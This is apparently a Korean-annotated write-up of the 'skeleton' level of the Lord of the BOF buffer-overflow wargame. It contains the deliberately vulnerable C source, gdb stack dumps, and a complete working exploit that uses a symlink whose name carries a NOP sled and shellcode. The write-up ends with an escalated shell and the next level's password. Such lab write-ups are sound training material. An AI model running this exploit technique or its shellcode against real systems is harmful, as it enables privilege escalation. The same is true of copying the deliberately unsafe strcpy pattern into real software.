[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * main - the Lord of the BOF "skeleton" target.
 *
 * Deliberately vulnerable: copies argv[1] (allowed to be up to 48 bytes)
 * into a 40-byte stack buffer with strcpy(), and then wipes every other
 * attacker-controlled string it knows about (environment strings, the
 * argv[] strings, the buffer itself) so the overflow cannot simply return
 * into any of them.
 *
 * NOTE(review): strlen/strcpy/memset are used without <string.h>, and main
 * has no return type.  On the K&R-era compiler this exercise targets that
 * is an implicit declaration / implicit int; on a C99+ compiler it is an
 * error.  Nothing here is "fixed" on purpose - the bugs are the exercise.
 */
main(int argc, char *argv[])
{
char buffer[40];    // overflow target: 40 bytes, strcpy'd with up to 48 + NUL
int i, saved_argc;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter: zero the contents of every environment string so shellcode
// cannot be parked in the environment (the environ[] pointers stay, only
// the bytes they point at become NULs)
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// Require byte 47 of argv[1] to be 0xbf.  Judging by the exploit at the
// bottom of the page (44 filler bytes then a 4-byte address), offset 44..47
// lands on the saved return address on this build, so this forces its most
// significant byte to 0xbf - i.e. the return must go to a stack address.
// NOTE(review): argv[1][47] is read BEFORE the length check below, so a
// shorter argv[1] makes this an out-of-bounds read past its terminator
// (it merely sends the caller to the "stack is still your friend" exit,
// but it is a real OOB read).
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument: caps the overflow at 48 bytes plus the
// terminating NUL - 9 bytes past the end of buffer[40], enough to reach
// what sits above the buffer but not much further
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// argc saver: keep a copy of argc before the overflow, presumably because
// the 9-byte overrun can reach the argc slot above the return address and
// the loop at the end still needs the real count
saved_argc = argc;
strcpy(buffer, argv[1]);    // THE BUG: unbounded copy of up to 49 bytes into buffer[40]
printf("%s\n", buffer);
// buffer hunter: wipe the overflowed buffer so shellcode cannot live there
memset(buffer, 0, 40);
// ultra argv hunter!: wipe argv[0..argc-1] as well.  The one string this
// does not reach is the absolute executable path seen near the top of the
// stack in the gdb dump below (separate from argv[0], which is cleared here);
// that is the string the write-up's symlink trick relies on.
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}
풀다가 당황했다. environ과 argv[0..argc-1]의 내용을 전부 0으로 지우기 때문에 쉘코드를 둘 곳이 없어 보였는데, gdb로 스택 최상단을 살펴보니 실행 파일의 절대 경로 문자열(아래 0xbfffffe6의 "/home/vampire/tmp/vul")은 지워지지 않고 남아 있었다. 이 문자열은 argv[0]과는 별개로 스택 꼭대기에 올라가는 것이라 프로그램의 memset 루프가 건드리지 못한다.
0xbfffffdf: ""
0xbfffffe0: ""
0xbfffffe1: ""
0xbfffffe2: ""
0xbfffffe3: ""
0xbfffffe4: ""
0xbfffffe5: ""
0xbfffffe6: "/home/vampire/tmp/vul"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
심볼릭 링크를 이용하면 될듯하다. 이 경로 문자열은 프로그램이 지우지 않으므로, NOP 슬레드와 쉘코드를 이어 붙인 이름으로 심볼릭 링크를 만들어 실행하면 그 이름이 경로의 일부로 스택 최상단에 그대로 올라간다. 리턴 주소는 이 NOP 슬레드 안쪽의 0xbfffxxxx 주소로 덮으면 되고, argv[1][47]이 0xbf여야 한다는 검사도 자연스럽게 통과한다. 단, gdb 안에서 본 주소와 실제 실행 시 주소는 환경 차이로 어긋나므로 슬레드를 넉넉히(아래에서는 0x90 200바이트) 두고 그 안쪽을 겨냥한다.
0xbfffffe7: "/home/vampire/tmp/sa"
0xbffffffc: ""
0xbfffffe7: 0x6d6f682f 0x61762f65 0x7269706d 0x6d742f65
0xbffffff7: 0x61732f70 0x00000000 Cannot access memory at address 0xbfffffff
(gdb) x/s 0xbfffffe7
0xbfffffe7: "/home/vampire/tmp/sa"
(gdb)
0xbffffb45:0xbffffef8:
0xbfffff48
0xbffffa48: 0x6d6f682f 0x61762f65 0x7269706d 0x6d742f65
0xbffffa58: 0x2f2e2f70 0x90909090 0x90909090 0x90909090
0xbffffa68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb18: 0x90909090 0x90909090 0x90909090 0xcee28a68
0xbffffb28: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901
0xbffffb38: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79
0xbffffb48: 0x00c354e1 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb58: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb68: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb78: 0xbfbfbfbf 0x00000000 0x00000000 0x00000000
0xbffffb88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef8: "/home/vampire/tmp/./", '\220' <repeats 180 times>...
0xbfffffc0: '\220' <repeats 20 times>, "h\212aI\201h±\fSThjo\212ah\001i0chi0tij\024Yþ\f\fIyuA÷aTA"
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿8yy¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$